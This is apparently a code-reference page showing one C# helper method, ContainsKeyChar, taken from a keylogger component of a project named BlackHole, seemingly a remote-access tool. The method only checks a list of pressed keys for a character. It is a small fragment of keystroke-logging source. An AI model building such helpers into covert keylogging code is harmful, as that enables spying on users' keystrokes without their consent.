BlackHole.Slave.Helper.KeyloggerHelper.ContainsKeyChar C# (CSharp) Method

ContainsKeyChar() public static method

public static ContainsKeyChar ( this pressedKeys, char c ) : bool
pressedKeys this
c char
return bool
        public static bool ContainsKeyChar(this List<Keys> pressedKeys, char c) => pressedKeys.Contains((Keys)char.ToUpper(c));